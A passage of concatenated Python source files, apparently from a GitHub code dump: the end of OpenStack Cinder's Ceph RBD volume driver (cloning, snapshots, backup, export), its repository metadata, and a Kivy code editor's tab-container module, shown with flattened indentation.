snapshot=ascii_str(snapshot),
read_only=read_only)
except driver.rbd.Error:
LOG.exception(_("error opening rbd image %s"), name)
driver._disconnect_from_rados(client, ioctx)
raise
self.driver = driver
self.client = client
self.ioctx = ioctx
def __enter__(self):
return self
def __exit__(self, type_, value, traceback):
try:
self.volume.close()
finally:
self.driver._disconnect_from_rados(self.client, self.ioctx)
def __getattr__(self, attrib):
return getattr(self.volume, attrib)
class RADOSClient(object):
"""Context manager to simplify error handling for connecting to ceph."""
def __init__(self, driver, pool=None):
self.driver = driver
self.cluster, self.ioctx = driver._connect_to_rados(pool)
def __enter__(self):
return self
def __exit__(self, type_, value, traceback):
self.driver._disconnect_from_rados(self.cluster, self.ioctx)
class RBDDriver(driver.VolumeDriver):
"""Implements RADOS block device (RBD) volume commands."""
VERSION = '1.1.0'
def __init__(self, *args, **kwargs):
super(RBDDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(rbd_opts)
self._stats = {}
# allow overrides for testing
self.rados = kwargs.get('rados', rados)
self.rbd = kwargs.get('rbd', rbd)
def check_for_setup_error(self):
"""Returns an error if prerequisites aren't met."""
if rados is None:
msg = _('rados and rbd python libraries not found')
raise exception.VolumeBackendAPIException(data=msg)
try:
with RADOSClient(self):
pass
except self.rados.Error:
msg = _('error connecting to ceph cluster')
LOG.exception(msg)
raise exception.VolumeBackendAPIException(data=msg)
def _ceph_args(self):
args = []
if self.configuration.rbd_user:
args.extend(['--id', self.configuration.rbd_user])
if self.configuration.rbd_ceph_conf:
args.extend(['--conf', self.configuration.rbd_ceph_conf])
return args
def _connect_to_rados(self, pool=None):
ascii_user = ascii_str(self.configuration.rbd_user)
ascii_conf = ascii_str(self.configuration.rbd_ceph_conf)
client = self.rados.Rados(rados_id=ascii_user, conffile=ascii_conf)
try:
client.connect()
pool_to_open = str(pool or self.configuration.rbd_pool)
ioctx = client.open_ioctx(pool_to_open)
return client, ioctx
except self.rados.Error:
# shutdown cannot raise an exception
client.shutdown()
raise
def _disconnect_from_rados(self, client, ioctx):
# closing an ioctx cannot raise an exception
ioctx.close()
client.shutdown()
def _get_backup_snaps(self, rbd_image):
"""Get list of any backup snapshots that exist on this volume.
There should only ever be one but accept all since they need to be
deleted before the volume can be.
"""
# NOTE(dosaboy): we do the import here otherwise we get import conflict
# issues between the rbd driver and the ceph backup driver. These
# issues only seem to occur when NOT using them together and are
# triggered when the ceph backup driver imports the rbd volume driver.
from cinder.backup.drivers import ceph
return ceph.CephBackupDriver.get_backup_snaps(rbd_image)
def _get_mon_addrs(self):
args = ['ceph', 'mon', 'dump', '--format=json']
args.extend(self._ceph_args())
out, _ = self._execute(*args)
lines = out.split('\n')
if lines[0].startswith('dumped monmap epoch'):
lines = lines[1:]
monmap = json.loads('\n'.join(lines))
addrs = [mon['addr'] for mon in monmap['mons']]
hosts = []
ports = []
for addr in addrs:
host_port = addr[:addr.rindex('/')]
host, port = host_port.rsplit(':', 1)
hosts.append(host.strip('[]'))
ports.append(port)
return hosts, ports
def _update_volume_stats(self):
stats = {
'vendor_name': 'Open Source',
'driver_version': self.VERSION,
'storage_protocol': 'ceph',
'total_capacity_gb': 'unknown',
'free_capacity_gb': 'unknown',
'reserved_percentage': 0,
}
backend_name = self.configuration.safe_get('volume_backend_name')
stats['volume_backend_name'] = backend_name or 'RBD'
try:
with RADOSClient(self) as client:
new_stats = client.cluster.get_cluster_stats()
stats['total_capacity_gb'] = new_stats['kb'] / 1024 ** 2
stats['free_capacity_gb'] = new_stats['kb_avail'] / 1024 ** 2
except self.rados.Error:
# just log and return unknown capacities
LOG.exception(_('error refreshing volume stats'))
self._stats = stats
def get_volume_stats(self, refresh=False):
"""Return the current state of the volume service.
If 'refresh' is True, run the update first.
"""
if refresh:
self._update_volume_stats()
return self._stats
def _supports_layering(self):
return hasattr(self.rbd, 'RBD_FEATURE_LAYERING')
def _get_clone_depth(self, client, volume_name, depth=0):
"""Returns the number of ancestral clones (if any) of the given volume.
"""
parent_volume = self.rbd.Image(client.ioctx, volume_name)
try:
pool, parent, snap = self._get_clone_info(parent_volume,
volume_name)
finally:
parent_volume.close()
if not parent:
return depth
# If clone depth was reached, flatten should have occured so if it has
# been exceeded then something has gone wrong.
if depth > CONF.rbd_max_clone_depth:
raise Exception(_("clone depth exceeds limit of %s") %
(CONF.rbd_max_clone_depth))
return self._get_clone_depth(client, parent, depth + 1)
def create_cloned_volume(self, volume, src_vref):
"""Create a cloned volume from another volume.
Since we are cloning from a volume and not a snapshot, we must first
create a snapshot of the source volume.
The user has the option to limit how long a volume's clone chain can be
by setting rbd_max_clone_depth. If a clone is made of another clone
and that clone has rbd_max_clone_depth clones behind it, the source
volume will be flattened.
"""
src_name = str(src_vref['name'])
dest_name = str(volume['name'])
flatten_parent = False
# Do full copy if requested
if CONF.rbd_max_clone_depth <= 0:
with RBDVolumeProxy(self, src_name, read_only=True) as vol:
vol.copy(vol.ioctx, dest_name)
return
# Otherwise do COW clone.
with RADOSClient(self) as client:
depth = self._get_clone_depth(client, src_name)
# If source volume is a clone and rbd_max_clone_depth reached,
# flatten the source before cloning. Zero rbd_max_clone_depth means
# infinite is allowed.
if depth == CONF.rbd_max_clone_depth:
LOG.debug(_("maximum clone depth (%d) has been reached - "
"flattening source volume") %
(CONF.rbd_max_clone_depth))
flatten_parent = True
src_volume = self.rbd.Image(client.ioctx, src_name)
try:
# First flatten source volume if required.
if flatten_parent:
pool, parent, snap = self._get_clone_info(src_volume,
src_name)
# Flatten source volume
LOG.debug(_("flattening source volume %s") % (src_name))
src_volume.flatten()
# Delete parent clone snap
parent_volume = self.rbd.Image(client.ioctx, parent)
try:
parent_volume.unprotect_snap(snap)
parent_volume.remove_snap(snap)
finally:
parent_volume.close()
# Create new snapshot of source volume
clone_snap = "%s.clone_snap" % dest_name
LOG.debug(_("creating snapshot='%s'") % (clone_snap))
src_volume.create_snap(clone_snap)
src_volume.protect_snap(clone_snap)
except Exception as exc:
# Only close if exception since we still need it.
src_volume.close()
raise exc
# Now clone source volume snapshot
try:
LOG.debug(_("cloning '%(src_vol)s@%(src_snap)s' to "
"'%(dest)s'") %
{'src_vol': src_name, 'src_snap': clone_snap,
'dest': dest_name})
self.rbd.RBD().clone(client.ioctx, src_name, clone_snap,
client.ioctx, dest_name,
features=self.rbd.RBD_FEATURE_LAYERING)
except Exception as exc:
src_volume.unprotect_snap(clone_snap)
src_volume.remove_snap(clone_snap)
raise exc
finally:
src_volume.close()
LOG.debug(_("clone created successfully"))
def create_volume(self, volume):
"""Creates a logical volume."""
if int(volume['size']) == 0:
size = 100 * units.MiB
else:
size = int(volume['size']) * units.GiB
LOG.debug(_("creating volume '%s'") % (volume['name']))
old_format = True
features = 0
if self._supports_layering():
old_format = False
features = self.rbd.RBD_FEATURE_LAYERING
with RADOSClient(self) as client:
self.rbd.RBD().create(client.ioctx,
str(volume['name']),
size,
old_format=old_format,
features=features)
def _flatten(self, pool, volume_name):
LOG.debug(_('flattening %(pool)s/%(img)s') %
dict(pool=pool, img=volume_name))
with RBDVolumeProxy(self, volume_name, pool) as vol:
vol.flatten()
def _clone(self, volume, src_pool, src_image, src_snap):
LOG.debug(_('cloning %(pool)s/%(img)s@%(snap)s to %(dst)s') %
dict(pool=src_pool, img=src_image, snap=src_snap,
dst=volume['name']))
with RADOSClient(self, src_pool) as src_client:
with RADOSClient(self) as dest_client:
self.rbd.RBD().clone(src_client.ioctx,
str(src_image),
str(src_snap),
dest_client.ioctx,
str(volume['name']),
features=self.rbd.RBD_FEATURE_LAYERING)
def _resize(self, volume, **kwargs):
size = kwargs.get('size', None)
if not size:
size = int(volume['size']) * units.GiB
with RBDVolumeProxy(self, volume['name']) as vol:
vol.resize(size)
def create_volume_from_snapshot(self, volume, snapshot):
"""Creates a volume from a snapshot."""
self._clone(volume, self.configuration.rbd_pool,
snapshot['volume_name'], snapshot['name'])
if self.configuration.rbd_flatten_volume_from_snapshot:
self._flatten(self.configuration.rbd_pool, volume['name'])
if int(volume['size']):
self._resize(volume)
def _delete_backup_snaps(self, client, volume_name):
rbd_image = self.rbd.Image(client.ioctx, volume_name)
try:
backup_snaps = self._get_backup_snaps(rbd_image)
if backup_snaps:
for snap in backup_snaps:
rbd_image.remove_snap(snap['name'])
else:
LOG.debug(_("volume has no backup snaps"))
finally:
rbd_image.close()
def _get_clone_info(self, volume, volume_name, snap=None):
"""If volume is a clone, return its parent info.
Returns a tuple of (pool, parent, snap). A snapshot may optionally be
provided for the case where a cloned volume has been flattened but it's
snapshot still depends on the parent.
"""
try:
snap and volume.set_snap(snap)
pool, parent, parent_snap = tuple(volume.parent_info())
snap and volume.set_snap(None)
# Strip the tag off the end of the volume name since it will not be
# in the snap name.
if volume_name.endswith('.deleted'):
volume_name = volume_name[:-len('.deleted')]
# Now check the snap name matches.
if parent_snap == "%s.clone_snap" % volume_name:
return pool, parent, parent_snap
except self.rbd.ImageNotFound:
LOG.debug(_("volume %s is not a clone") % volume_name)
volume.set_snap(None)
return (None, None, None)
def _delete_clone_parent_refs(self, client, parent_name, parent_snap):
"""Walk back up the clone chain and delete references.
Deletes references i.e. deleted parent volumes and snapshots.
"""
parent_rbd = self.rbd.Image(client.ioctx, parent_name)
parent_has_snaps = False
try:
# Check for grandparent
_pool, g_parent, g_parent_snap = self._get_clone_info(parent_rbd,
parent_name,
parent_snap)
LOG.debug(_("deleting parent snapshot %s") % (parent_snap))
parent_rbd.unprotect_snap(parent_snap)
parent_rbd.remove_snap(parent_snap)
parent_has_snaps = bool(list(parent_rbd.list_snaps()))
finally:
parent_rbd.close()
# If parent has been deleted in Cinder, delete the silent reference and
# keep walking up the chain if it is itself a clone.
if (not parent_has_snaps) and parent_name.endswith('.deleted'):
LOG.debug(_("deleting parent %s") % (parent_name))
self.rbd.RBD().remove(client.ioctx, parent_name)
# Now move up to grandparent if there is one
if g_parent:
self._delete_clone_parent_refs(client, g_parent, g_parent_snap)
def delete_volume(self, volume):
"""Deletes a logical volume."""
volume_name = str(volume['name'])
with RADOSClient(self) as client:
# Ensure any backup snapshots are deleted
self._delete_backup_snaps(client, volume_name)
# If the volume has non-clone snapshots this delete is expected to
# raise VolumeIsBusy so do so straight away.
rbd_image = self.rbd.Image(client.ioctx, volume_name)
clone_snap = None
parent = None
try:
snaps = rbd_image.list_snaps()
for snap in snaps:
if snap['name'].endswith('.clone_snap'):
LOG.debug(_("volume has clone snapshot(s)"))
# We grab one of these and use it when fetching parent
# info in case the this volume has been flattened.
clone_snap = snap['name']
break
raise exception.VolumeIsBusy(volume_name=volume_name)
# Determine if this volume is itself a clone
pool, parent, parent_snap = self._get_clone_info(rbd_image,
volume_name,
clone_snap)
finally:
rbd_image.close()
if clone_snap is None:
LOG.debug(_("deleting rbd volume %s") % (volume_name))
self.rbd.RBD().remove(client.ioctx, volume_name)
# If it is a clone, walk back up the parent chain deleting
# references.
if parent:
LOG.debug(_("volume is a clone so cleaning references"))
self._delete_clone_parent_refs(client, parent, parent_snap)
else:
# If the volume has copy-on-write clones we will not be able to
# delete it. Instead we will keep it as a silent volume which
# will be deleted when it's snapshot and clones are deleted.
new_name = "%s.deleted" % (volume_name)
self.rbd.RBD().rename(client.ioctx, volume_name, new_name)
def create_snapshot(self, snapshot):
"""Creates an rbd snapshot."""
with RBDVolumeProxy(self, snapshot['volume_name']) as volume:
snap = str(snapshot['name'])
volume.create_snap(snap)
if self._supports_layering():
volume.protect_snap(snap)
def delete_snapshot(self, snapshot):
"""Deletes an rbd snapshot."""
with RBDVolumeProxy(self, snapshot['volume_name']) as volume:
snap = str(snapshot['name'])
if self._supports_layering():
try:
volume.unprotect_snap(snap)
except self.rbd.ImageBusy:
raise exception.SnapshotIsBusy(snapshot_name=snap)
volume.remove_snap(snap)
def ensure_export(self, context, volume):
"""Synchronously recreates an export for a logical volume."""
pass
def create_export(self, context, volume):
"""Exports the volume."""
pass
def remove_export(self, context, volume):
"""Removes an export for a logical volume."""
pass
def initialize_connection(self, volume, connector):
hosts, ports = self._get_mon_addrs()
data = {
'driver_volume_type': 'rbd',
'data': {
'name': '%s/%s' % (self.configuration.rbd_pool,
volume['name']),
'hosts': hosts,
'ports': ports,
'auth_enabled': (self.configuration.rbd_user is not None),
'auth_username': self.configuration.rbd_user,
'secret_type': 'ceph',
'secret_uuid': self.configuration.rbd_secret_uuid, }
}
LOG.debug(_('connection data: %s'), data)
return data
def terminate_connection(self, volume, connector, **kwargs):
pass
def _parse_location(self, location):
prefix = 'rbd://'
if not location.startswith(prefix):
reason = _('Not stored in rbd')
raise exception.ImageUnacceptable(image_id=location, reason=reason)
pieces = map(urllib.unquote, location[len(prefix):].split('/'))
if any(map(lambda p: p == '', pieces)):
reason = _('Blank components')
raise exception.ImageUnacceptable(image_id=location, reason=reason)
if len(pieces) != 4:
reason = _('Not an rbd snapshot')
raise exception.ImageUnacceptable(image_id=location, reason=reason)
return pieces
def _get_fsid(self):
with RADOSClient(self) as client:
return client.cluster.get_fsid()
def _is_cloneable(self, image_location):
try:
fsid, pool, image, snapshot = self._parse_location(image_location)
except exception.ImageUnacceptable as e:
LOG.debug(_('not cloneable: %s'), e)
return False
if self._get_fsid() != fsid:
reason = _('%s is in a different ceph cluster') % image_location
LOG.debug(reason)
return False
# check that we can read the image
try:
with RBDVolumeProxy(self, image,
pool=pool,
snapshot=snapshot,
read_only=True):
return True
except self.rbd.Error as e:
LOG.debug(_('Unable to open image %(loc)s: %(err)s') %
dict(loc=image_location, err=e))
return False
def clone_image(self, volume, image_location, image_id):
image_location = image_location[0] if image_location else None
if image_location is None or not self._is_cloneable(image_location):
return ({}, False)
prefix, pool, image, snapshot = self._parse_location(image_location)
self._clone(volume, pool, image, snapshot)
self._resize(volume)
return {'provider_location': None}, True
def _ensure_tmp_exists(self):
tmp_dir = self.configuration.volume_tmp_dir
if tmp_dir and not os.path.exists(tmp_dir):
os.makedirs(tmp_dir)
def copy_image_to_volume(self, context, volume, image_service, image_id):
self._ensure_tmp_exists()
tmp_dir = self.configuration.volume_tmp_dir
with tempfile.NamedTemporaryFile(dir=tmp_dir) as tmp:
image_utils.fetch_to_raw(context, image_service, image_id,
tmp.name)
self.delete_volume(volume)
# keep using the command line import instead of librbd since it
# detects zeroes to preserve sparseness in the image
args = ['rbd', 'import',
'--pool', self.configuration.rbd_pool,
tmp.name, volume['name']]
if self._supports_layering():
args.append('--new-format')
args.extend(self._ceph_args())
self._try_execute(*args)
self._resize(volume)
def copy_volume_to_image(self, context, volume, image_service, image_meta):
self._ensure_tmp_exists()
tmp_dir = self.configuration.volume_tmp_dir or '/tmp'
tmp_file = os.path.join(tmp_dir,
volume['name'] + '-' + image_meta['id'])
with fileutils.remove_path_on_error(tmp_file):
args = ['rbd', 'export',
'--pool', self.configuration.rbd_pool,
volume['name'], tmp_file]
args.extend(self._ceph_args())
self._try_execute(*args)
image_utils.upload_volume(context, image_service,
image_meta, tmp_file)
os.unlink(tmp_file)
def backup_volume(self, context, backup, backup_service):
"""Create a new backup from an existing volume."""
volume = self.db.volume_get(context, backup['volume_id'])
pool = self.configuration.rbd_pool
with RBDVolumeProxy(self, volume['name'], pool) as rbd_image:
rbd_meta = RBDImageMetadata(rbd_image, self.configuration.rbd_pool,
self.configuration.rbd_user,
self.configuration.rbd_ceph_conf)
rbd_fd = RBDImageIOWrapper(rbd_meta)
backup_service.backup(backup, rbd_fd)
LOG.debug(_("volume backup complete."))
def restore_backup(self, context, backup, volume, backup_service):
"""Restore an existing backup to a new or existing volume."""
pool = self.configuration.rbd_pool
with RBDVolumeProxy(self, volume['name'], pool) as rbd_image:
rbd_meta = RBDImageMetadata(rbd_image, self.configuration.rbd_pool,
self.configuration.rbd_user,
self.configuration.rbd_ceph_conf)
rbd_fd = RBDImageIOWrapper(rbd_meta)
backup_service.restore(backup, volume['id'], rbd_fd)
LOG.debug(_("volume restore complete."))
def extend_volume(self, volume, new_size):
"""Extend an existing volume."""
old_size = volume['size']
try:
size = int(new_size) * units.GiB
self._resize(volume, size=size)
except Exception:
msg = _('Failed to Extend Volume '
'%(volname)s') % {'volname': volume['name']}
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug(_("Extend volume from %(old_size)s GB to %(new_size)s GB."),
{'old_size': old_size, 'new_size': new_size})
|
{
"content_hash": "59c85485ce8a883404bf681347050c9e",
"timestamp": "",
"source": "github",
"line_count": 805,
"max_line_length": 79,
"avg_line_length": 38.54782608695652,
"alnum_prop": 0.5549611678643936,
"repo_name": "cloudbau/cinder",
"id": "ddcf16dcde07adee8d67c1571f6b842ed6899a84",
"size": "31646",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "cinder/volume/drivers/rbd.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "5235714"
},
{
"name": "Shell",
"bytes": "8994"
}
],
"symlink_target": ""
}
|
"""
editorcontainer
==================
**Module**: ``editorcontainer.editorcontainer.py``
Module that contains all that's necessary to create
the file tabs
"""
import os
import math
from kivy.uix.boxlayout import BoxLayout
from kivy.properties import ObjectProperty
from kivy.properties import StringProperty
from kivy.uix.tabbedpanel import TabbedPanelHeader
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.button import Button
from kivy.uix.widget import Widget
from kivy.clock import Clock
from kivy.core.window import Window
from kivy.properties import BooleanProperty
from kivy.uix.scrollview import ScrollView
from editorcontainer.editor.editor import Editor
from editorcontainer.rightclickmenu.rightclickmenu import RightClickMenu
from confirmationdialog.confirmationdialog import ConfirmationDialog
class CodeScrollView(ScrollView):
"""A :py:class:`kivy.uix.scrollview.ScrollView` that contains the
editor and line numbers.
The purpose of this class is to make the line numbers and editor
scrollable together.
"""
line_numbers_strip = ObjectProperty(None)
""":py:class:`kivy.properties.ObjectProperty` reference to the line
numbers widget, of type :py:class:`~editorcontainer.editor.editor.Editor`
"""
editor = ObjectProperty(None)
""":py:class:`kivy.properties.ObjectProperty` reference to the editor
widget, of type :py:class:`~editorcontainer.editor.editor.Editor`
"""
layout = ObjectProperty(None)
"""Reference to the layout that is the content of this :py:class:`.CodeScrollView`.
It contains the :py:attr:`.editor` and :py:attr:`.line_numbers_strip`
"""
show_line_numbers = BooleanProperty(True)
""":py:class:`kivy.properties.BooleanProperty` that indicates wether this
:py:class:`.CodeScrollView` should display the line numbers (:py:obj:`True`)
or not (:py:obj:`False`). Defaults to :py:obj:`True`.
"""
def __init__(self, **kwargs):
"""Call __init__ from super and decide wether to show the line numbers"""
super(CodeScrollView, self).__init__(**kwargs)
self.max_num_of_lines = 0
"""Maximum number of lines actually.
It will increase depending on the quantity of lines in the editor.
Generally, it increases when 'enter' is pressed (a new line is added).
Defaults to 0.
"""
self.scroll_distance = self.editor.line_height
self.editor.bind(focus=self.on_editor_focus)
parent = self.line_numbers_strip.parent
if not self.show_line_numbers:
parent.remove_widget(self.line_numbers_strip)
else:
self.editor.bind(_lines=self.on_lines_change)
def on_editor_focus(self, widget, value):
"""Bind or unbind :py:meth:`.on_keyboard` depending on the focus of the editor
It binds an event (with the method :py:meth:`.on_keyboard`) to the
:py:attr:`kivy.core.window.Window.on_keyboard` attribute.
:param widget: Instance of the :py:attr:`kivy.uix.widget` on which the event ocurred (:py:attr:`.editor`).
:param value: Value of the property of the event (:py:attr:`.editor.focus` in this case).
"""
if value:
Window.bind(on_keyboard=self.on_keyboard)
Window.bind(on_mouse_down=self.on_mouse_down)
else:
Window.unbind(on_keyboard=self.on_keyboard)
Window.unbind(on_keyboard=self.on_mouse_down)
def on_mouse_down(self, mouse, x, y, button, modifiers):
"""Manage event when some mouse button is utliized.
For example, when the middle mouse button is used to scroll,
the cursor is repositioned here.
:param mouse: Instance of the mouse listener.
:param x: x position of the mouse.
:param y: y position of the mouse.
:param button: Mouse button pressed ('left', 'right', 'scrollup', ...)
:param modifiers: Modifiers used for the mouse press ('ctrl', 'alt', ...)
"""
self.editor.last_click = button
# In any case, remove a right click menu if there is one
rc_menu = self.editor_container.right_click_menu
if rc_menu is not None and rc_menu in Window.children:
top = Window.size[1] - (rc_menu.y + rc_menu.height)
bottom = (top + rc_menu.height - 10) #TODO find a way to remove this 10
# It's in the widget and I don't know why (in the widget in rightclickmenu.kv)
if ((x < rc_menu.x or x > rc_menu.width + rc_menu.x)
or (y < top or y > bottom) or button == 'right'):
Window.remove_widget(rc_menu)
# To show right click menu, let's brute force this.
# It calculates if the click is inside the visible area
# of the editor.
if button == 'right':
self.editor.text_from = self.editor._selection_from
self.editor.text_to = self.editor._selection_to
c_y = self.editor_container.y
c_h = self.editor_container.height
m_c_x = self.editor_container.to_widget(x, y, relative=True)
top = (Window.size[1] - c_y
- c_h + self.editor_container._tab_layout.height)
bottom = c_h + self.editor_container.parent.menu_bar.height
editor = self.editor_container.current_tab.content.editor
e_x = editor.x
e_w = editor.x + editor.width
if (len(self.editor_container.tab_list) > 0
and (x >= e_x and x < e_w)
and (y >= top and y <= bottom) ):
self.editor_container.open_right_click_menu(x+15, y)
if button == 'scrollup':
editor = self.editor
y_pos = math.floor(self.scroll_y
* float(self.viewport_size[1] - self.height))
new_col, new_row = editor.get_cursor_from_xy(self.scroll_x,
y_pos)
editor.cursor = (editor.cursor_col, new_row)
if button == 'scrolldown':
editor = self.editor
y_pos = math.floor(self.scroll_y
* float(self.viewport_size[1]
- self.height))
new_col, new_row = editor.get_cursor_from_xy(self.scroll_x,
y_pos + self.height)
editor.cursor = (editor.cursor_col, new_row)
def on_keyboard(self, keyboard, keycode, scancode, value, modifiers):
"""Manage keyboard events (on :py:attr:`.editor`).
It controls wether it should save the file (ctrl-s), etc.
:param keyboard: Instance of the keyboard manager.
:param keycode: Int that represents the pressed key.
:param scancode: Extra code (not used).
:param value: Value of the pressed key, as a :py:obj:`str`.
:param modifiers: List of pressed modifiers (such as 'ctrl', 'alt'...)
"""
# ctrl-s to save
if keycode == 115 and value == 's':
if 'ctrl' in modifiers and len(modifiers) == 1:
self.editor.save_tab()
# To fix the up and down keys navigation, keycode for up key
# is 273 and for down key is 274
if keycode == 274:
self.key_down()
if keycode == 273:
self.key_up()
def key_down(self):
"""Change the scroll position if the cursor postion after
pressing the 'down' if needed."""
y_pos = self.editor.cursor_pos[1]
line_height = self.editor.line_height
traveled = math.floor(self.scroll_y * float(self.viewport_size[1] - self.height))
if ( self.viewport_size[1] > traveled):
inverse_traveled = self.viewport_size[1] - traveled
else:
inverse_traveled = 0
inverse_y_pos = self.viewport_size[1] - y_pos
if (inverse_y_pos + line_height) > inverse_traveled:
# Normalize the quantity to be between 0 and 1
normalized = self.convert_distance_to_scroll(0, line_height)
# Reposition the scroll
new_scroll_y = self.scroll_y - normalized[1]
if new_scroll_y >= 0:
self.scroll_y = new_scroll_y
else:
self.scroll_y = 0
def key_up(self):
"""Change the scroll position if the cursor postion after
pressing the 'up' if needed."""
y_pos = self.editor.cursor_pos[1]
line_height = self.editor.line_height
traveled = math.floor(self.scroll_y
* float(self.viewport_size[1] - self.height))
if y_pos > (traveled + self.height):
# Normalize the quantity to be between 0 and 1
normalized = self.convert_distance_to_scroll(0, line_height)
# Reposition the scroll
new_scroll_y = self.scroll_y + normalized[1]
if new_scroll_y <= 1:
self.scroll_y = new_scroll_y
else:
self.scroll_y = 1
def on_lines_change(self, widget, value):
"""Manage event when :py:attr:`editor._lines` changes
Requests an update on the line numbers depending on the situation.
:param widget: Instance of the :py:attr:`kivy.uix.widget` on which the event ocurred (:py:attr:`.editor`).
:param value: Value of :py:attr:`.editor._lines` after it changed.
"""
n = len(value)
if n > self.max_num_of_lines:
self.update_lines_number(self.max_num_of_lines, n)
def on_show_line_numbers(self, widget, value):
"""Manage event when :py:attr:`.show_line_numbers` changes.
:param widget: :py:attr:`kivy.uix.widget` on which the event ocurred (this :py:class:`.CodeScrollView`).
:param value: Value of :py:attr:`.show_line_numbers` after the change.
"""
if value:
max_num_l = str(self.max_num_of_lines)
_get_extents = self.line_numbers_strip._label_cached.get_extents
padding = self.line_numbers_strip.padding[0] * 2
self.line_numbers_strip.width = (_get_extents(str(max_num_l))[0]
+ padding)
else:
self.line_numbers_strip.width = 0
def update_lines_number(self, old, new):
"""Update the lines number.
When the number of lines increases, the line numbers should be updated
using this method (thid method is called by :py:meth:`.on_lines_change`).
:param old: Old number of lines
:param new: New number of lines
"""
self.max_num_of_lines = new
lines = [str(i) for i in range(old + 1, new + 1)]
self.line_numbers_strip.text += '\n'.join(lines) + '\n'
max_num_l = str(self.max_num_of_lines)
_get_extents = self.line_numbers_strip._label_cached.get_extents
padding = self.line_numbers_strip.padding[0] * 2
self.line_numbers_strip.width = (_get_extents(str(max_num_l))[0]
+ padding)
class EditorContainer(TabbedPanel):
"""Used to create a tab for a new file or load a file.
This :py:class:`.EditorContainer` has tabs. Each tab
consists of an :py:class:`.EditorTab` and a content.
The content will be a :py:class:`.CodeScrollView`.
"""
right_click_menu = None
"""Stores the :py:class:`editorcontainer.rightclickmenu.rightclickmenu.RightClickMenu`
to use in the application."""
def __init__(self, **kwargs):
super(EditorContainer, self).__init__()
self.default_tab_mimetype = None
"""Stores the mimetype (of a file) of a default tab.
Used to store the mimetype of a file that is opened directly with the
application (from 'console'). Defaults to :py:obj:`None`.
"""
self.default_tab_file_path = None
"""Stores the path (to a file) of a default tab.
Used to store the path of a file that is opened directly with the application
(from 'console'). Defaults to :py:obj:`None`.
"""
# Bind current_tab to disable the unused editors
# and enable the current one.
self.bind(current_tab=self.disable_tabs)
def add_new_tab(self, mime_type=None, tab_name=None):
"""Add a new tab.
The contents of the added tab depend on the mime_type and
tab_name. The tab is added to this :py:class:`.EditorContainer`.
The 'text' attribute of The :py:class:`editorcontainer.editor.editor.Editor` is binded to
its method :py:meth:`editorcontainer.editor.editor.Editor.text_changed` if a blank new tab
is created.
:param mime_type: Mimetype of the file to open (contents of the new tab). Defaults to :py:obj:`None` if no file will be opened.
:param tab_name: Name to put in the tab header. It's the name of the file. Defaults to :py:obj:`None`.
:return: The created tab, an :py:class:`.EditorTab`.
"""
editor_tab = EditorTab()
editor_content = CodeScrollView()
editor_content.editor_container = self
editor_tab.content = editor_content
editor_tab.change_tab_name(tab_name)
#editor_tab.width = 200
self.add_widget(editor_tab)
editor_content.editor.tab = editor_tab
#TODO Change this to 'self.switch_to(editor, do_scroll=True)
# when kivy 1.9.2 releases
self.switch_to(editor_tab)
editor = editor_tab.content.editor
editor.propagate_editor_container(self)
if tab_name is None:
editor.text=' '
editor.text=''
editor.bind(text=editor.text_changed)
self.footer_visibility()
return editor_tab
def disable_tabs(self, widget, value):
"""Manage the event when the current_tab changes.
It enables the tab's editor to which the user changed and
disables all others.
"""
for tab in self.tab_list:
tab.content.editor.disabled = True
widget.current_tab.content.editor.disabled = False
def build_default_tab(self):
"""Build a default tab. It's a tab created when the application is opened.
The default type depends on :py:attr:`.default_tab_file_path` and
:py:attr:`.default_tab_mimetype`. If those attributes are :py:obj:`None`
a blank new tab will be created, otherwise a tab with the contents of
:py:attr:`.default_tab_file_path` and highlighted for :py:attr:`.default_tab_mimetype`
will be created.
"""
self.build_tab(self.default_tab_file_path, self.default_tab_mimetype)
def build_tab(self, file_path = None, mime_type = None):
"""Build a tab.
The tab will have a path file_path and a mimetype mimetype.
The tab name is extracted from file_path, unless it's :py:obj:`None`.This
name is the file name, including the file extension.
If the parameters are :py:obj:`None`, a blank new tab is created.
The 'text' attribute of The :py:class:`editorcontainer.editor.editor.Editor` is binded to
its method :py:meth:`editorcontainer.editor.editor.Editor.text_changed` if a not blank tab
is created.
:param file_path: Path of the file to open. Defaults to :py:obj:`None`.
:param mimetype: Mimetype of the file to open. Defaults to :py:obj:`None`.
"""
text = ''
dir_path = None
file_name = None
if file_path is not None:
try:
with open(file_path) as file:
text = file.read()
except PermissionError as err:
print(err, "You don't have the required access rights"
" to read: {0}".format(path), sep = '\n')
dir_path = mime_type = file_name = file_path = None
except FileNotFoundError as err:
print(err, "{}: not found".format(file_path), sep='\n')
dir_path = mime_type = file_name = file_path = None
except IsADirectoryError as err:
print(err, "Cannot open a directory", sep = '\n')
dir_path = mime_type = file_name = file_path = None
else:
dir_path, file_name = os.path.split(file_path)
editor_tab = self.add_new_tab(mime_type,
file_name)
editor = editor_tab.content.editor
editor._name = file_name
editor._path = dir_path
editor.text = text
name = editor.change_lexer(mime_type)
self.parent.footer.change_information({'highlight_menu': name})
editor.bind(text=editor.text_changed)
def footer_visibility(self):
"""It there are no open tabs then remove the
footer from the GUI. If not then add it"""
container = self.parent
if len(self.tab_list) == 0:
container.remove_widget(container.footer)
elif len(self.tab_list) == 1:
if not (container.footer in container.children):
container.add_widget(container.footer)
def open_right_click_menu(self, x, y):
"""Open the right click menu.
The menu is added to :py:class:`kivy.core.window.Window`.
:param x: x position to place the menu.
:param y: y position to place the menu.
"""
inv_y = Window.height - y
rc_menu = self.right_click_menu
if rc_menu is not None:
rc_menu.pos = (x, inv_y - rc_menu.height)
else:
rc_menu = RightClickMenu()
rc_menu.pos = (x, inv_y - rc_menu.height)
self.right_click_menu = rc_menu
rc_menu.editor = self.current_tab.content.editor
Window.add_widget(rc_menu)
class EditorTab(TabbedPanelHeader):
"""Tab header of a tab to add to the :py:class:`.EditorContainer`.
It will display the name of the tab (which can be the name of the file
opened by that tab or the default, established in the related *.kv* file).
"""
close_button = ObjectProperty(None)
"""An :py:class:`kivy.properties.ObjectProperty` that's a reference
to the button to close the tab (the button is in the :py:class:`.EditorTab`).
"""
close_button_string = StringProperty('x')
"""Text to display in the :py:attr:`.close_button`.
It's a :py:class:`kivy.properties.StringProperty` and defaults to 'x'.
This attribute's value will change when a change to the text of the
:py:class:`editorcontainer.editor.editor.Editor` occurs and display an
asterisk (*) on top of it.
"""
